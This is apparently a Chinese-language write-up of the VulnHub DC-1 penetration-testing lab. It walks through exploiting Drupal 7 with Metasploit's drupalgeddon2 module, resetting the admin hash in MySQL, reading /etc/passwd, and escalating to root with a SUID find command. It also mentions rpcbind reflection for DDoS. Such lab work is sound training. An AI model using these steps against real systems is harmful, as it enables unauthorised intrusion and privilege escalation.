DC1
下载地址:
https://download.vulnhub.com/dc/DC-1.zip
题目要求:
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
信息收集
1.1 arp-scan -l
1.2 ifconfig
1.3 nmap -p- -sV 192.168.126.130
发现rpcbind
111端口rpcbind服务 可以利用udp反射进行ddos攻击
1.4 whatweb
渗透
2.1 发现drupal 7
2.2 进入msf
2.3 search drupal
2.3 尝试到unix/webapp/drupal_drupalgeddon2远程命令执行漏洞
use 1
show options
set rhost 192.168.126.130
run
getshell成功
sysinfo
(help
查看可用命令)
ls
2.4 发现flag1.txt
cat flag1.txt
数据库
3.1 提示drupal网站配置文件有东西
3.2 发现数据库
3.3 切换到主机的cmd中
shell
或者
shell
获取完全交互式终端
python -c 'import pty;pty.spawn("/bin/bash")'
或
script /dev/null
3.4 mysql -udbuser -p
R0ck3t
show databases;
use drupaldb;
show tables;
select * from users;
(退出exit
)
3.5 由前面查看网站配置文件时发现加盐MD5
所以该hash无法爆破
另辟蹊径
3.6 密码重置
find / -name "password-hash.sh"
php /var/www/scripts/password-hash.sh 123
复制加salt之后的md5
$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT
再次进入mysql中
update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;
4.1 登录后台
左上角的context
4.2 找到flag3
根据提示
cat /etc/passwd
cat /home/flag4.txt
4.3找到flag4
提权
5.1 根据flag4提示提权
linux提权之suid提权
5.2 查找具有suid的命令
find / -perm -u=s -type f 2>/dev/null
find本身就有suid
5.3 find提权
find /usr/bin/find -exec "/bin/sh" \;
cd /root
cat thefinalflag.txt
5.4 找到最后一个flag
排漏
3.7 CVE-2014-3704-Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
3.8 searchsploit Drupal
发现Drupal 7 有一个admin用户添加漏洞
3.9 定位
locate php/webapps/34992.py
3.10 复制到桌面
cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./
3.11 查看用法
cat 34992.py